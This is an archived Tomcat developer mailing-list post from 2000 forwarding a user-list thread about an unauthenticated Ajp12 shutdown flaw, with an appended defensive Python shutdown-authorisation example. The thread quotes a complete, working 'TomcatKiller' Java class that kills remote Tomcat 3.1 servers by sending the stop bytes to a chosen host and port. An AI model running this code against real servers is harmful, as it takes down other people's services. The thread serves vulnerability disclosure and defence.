tomcat-dev mailing list archives

From Michael Percy <mpe...@portera.com>
Subject Tomcat Security Vulnerability
Date Thu, 05 Oct 2000 21:01:38 GMT
All,
Since I am uncertain how many of you check the tomcat-user list often, and I
am not personally a Java developer, I wanted to get you all in the loop on
this (and hopefully get some discussion going on a solution). What I am
talking about is the "Tomcat Killer" thread on tomcat-user over the past
hour. I have pasted in the mentioned thread below, in hopes that the people
who can do something about it (the developers) will have comments on it. I am
also curious as to whether or not ajpv13 is susceptible to this kind of
attack, and am not sure how to go about finding out.


Regards,

Michael Percy
QA Automation Eng.
Portera Systems


> -----Original Message-----
> From: Michael Percy [mailto:mpercy@portera.com]
> Sent: Thursday, October 05, 2000 1:36 PM
> To: 'tomcat-user@jakarta.apache.org'
> Subject: RE: Tomcat Killer
> 
> 
> I'd like to point out that many people who wish to run Tomcat (at home, on a
> LAN, etc.) do not have a spare machine/router to filter packets. Plus, many
> setups include multiple ports on which different connectors run (to keep
> configurations separate, etc.) so one cannot just firewall 8007 and proclaim
> all is well. This is very dangerous and should be changed/patched/upgraded!
> If Tomcat requires a firewall to be run safely, then it is NOT a secure
> product (it relies on the security of other, unrelated people and
> products!). This must be taken care of.
> 
> On a related note, does anyone know if the JNI connector is susceptible to
> this? If not, then this can be a short-term workaround (does it work yet?).
> 
> 
> Regards,
> 
> Michael Percy
> QA Automation Eng.
> Portera Systems
> 
> 
> > -----Original Message-----
> > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > Sent: Thursday, October 05, 2000 1:27 PM
> > To: 'tomcat-user@jakarta.apache.org'
> > Subject: RE: Tomcat Killer
> > 
> > 
> > You would think that as long as your firewall only allows access to port 80
> > and/or 8080 and not 8007 then you would be fine.  Nice find though.
> > 
> > Josh
> > 
> > -----Original Message-----
> > From: Sean Schofield [mailto:sean@schof.com]
> > Sent: Thursday, October 05, 2000 1:23 PM
> > To: tomcat-user@jakarta.apache.org
> > Subject: Re: Tomcat Killer
> > 
> > 
> > Cool find!
> > 
> > Couldn't this be protected against by a firewall filtering incoming traffic
> > so both Apache and Tomcat are behind a firewall to the Internet and
> > another firewall between these servers and the LAN?  Then you would only
> > have to worry about other servlets, etc. within the firewall messing things
> > up.  And even then I think you need root to create sockets don't you?
> > 
> > Should this be posted to Bugtraq?
> > 
> > - schof
> > 
> > At 12:51 PM 10/5/00 -0700, you wrote:
> > 
> > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > >tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > >batch/shell file does its job by sending "exit please" bytes to
> > >Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> > >class below.  Just guess a host and port which may have Tomcat
> > >running, and over it goes...
> > >
> > >I patched the sources so hopefully it won't happen to me ;)
> > >
> > >
> > >import java.net.*;
> > >import java.io.*;
> > >
> > >public class TomcatKiller {
> > >
> > >    static public void main( String[] args ) {
> > >
> > >        // the two-byte message the Ajp12 "Stop Tomcat" script sends
> > >        final byte SIGNAL = (byte)254;
> > >        final byte BYEBYE = (byte)15;
> > >        byte[] msg = { SIGNAL, BYEBYE };
> > >
> > >        int min = 8007, max = 8007;   // default Ajp12 port
> > >        String host = args[0];
> > >
> > >        try {
> > >            if( args.length > 1 )
> > >                min = max = Integer.parseInt( args[1] );
> > >            if( args.length > 2 )
> > >                max = Integer.parseInt( args[2] );
> > >            if( min > max ) {
> > >                int tmp = min;
> > >                min = max;
> > >                max = tmp;
> > >            }
> > >            for( int i = min; i <= max; i++ ) {
> > >                try {
> > >                    Socket s = new Socket( host, i );
> > >                    OutputStream os = s.getOutputStream();
> > >                    os.write( msg );
> > >                    os.flush();
> > >                    break;
> > >                } catch( ConnectException ce ) {
> > >                    System.err.println( "conn refused " + i );
> > >                } catch( IOException ioe ) {
> > >                    ioe.printStackTrace();
> > >                    break;
> > >                }
> > >            }
> > >        } catch( Exception e ) {
> > >            e.printStackTrace();
> > >            System.exit( 1 );
> > >        }
> > >    }
> > >}
> > >
> > >// eof
> > >
> > >
> > >stu
> > >
> > >
> > >--
> > >Stuart Maclean, Research Associate
> > >University of Washington
> > >ITS Research Program, College of Engineering
> > >Box 352500
> > >Seattle, WA 98195-2500
> > >Tel: (206) 543-0637
> > >http://www.its.washington.edu
> > 
> 
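The check a connector listening for the Ajp12 stop message would need so that the two bytes alone no longer suffice, as an added example (not code from this thread or from any Tomcat release): honour the signal only from a loopback peer and only when a shared secret follows it, and emit an audit line for every attempt so remote ones are visible. The loopback rule, the secret-after-signal framing and the audit strings are assumptions of this example.

```python
import hmac
import ipaddress

# The two bytes the Tomcat 3.1 stop script sends over Ajp12 (from the thread).
SIGNAL = 0xFE
BYEBYE = 0x0F


def parse_shutdown_request(data: bytes):
    """Return the bytes after the stop signal if `data` is a shutdown
    message, else None. Treating the trailing bytes as a shared secret is
    an assumption of this example, not Ajp12 framing."""
    if len(data) < 2 or data[0] != SIGNAL or data[1] != BYEBYE:
        return None
    return data[2:]


def shutdown_allowed(peer_ip: str, data: bytes, expected_secret: bytes):
    """Decide whether a shutdown request may be honoured.

    Two independent checks (both assumptions of this example):
      1. the peer must be a loopback address;
      2. the secret carried after the signal must match `expected_secret`.
    Returns (decision, audit_line) so the listener can log every attempt."""
    secret = parse_shutdown_request(data)
    if secret is None:
        return False, f"ignored non-shutdown message from {peer_ip}"
    if not ipaddress.ip_address(peer_ip).is_loopback:
        return False, f"ALERT shutdown signal from non-local {peer_ip}"
    if not hmac.compare_digest(secret, expected_secret):
        return False, f"ALERT shutdown with bad secret from {peer_ip}"
    return True, f"shutdown accepted from {peer_ip}"


def audit(connections, expected_secret):
    """Apply the policy to (peer_ip, payload) records and collect audit lines."""
    return [shutdown_allowed(ip, payload, expected_secret)[1]
            for ip, payload in connections]


if __name__ == "__main__":
    SECRET = b"rotate-me"  # constructed value for the demonstration
    # Constructed traffic: a remote two-byte stop message as in the thread,
    # a local attempt without the secret, a legitimate local stop, noise.
    sample = [
        ("10.0.0.5", bytes([SIGNAL, BYEBYE])),
        ("127.0.0.1", bytes([SIGNAL, BYEBYE])),
        ("127.0.0.1", bytes([SIGNAL, BYEBYE]) + SECRET),
        ("192.168.1.9", b"\x01\x02\x03"),
    ]
    for line in audit(sample, SECRET):
        print(line)
```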
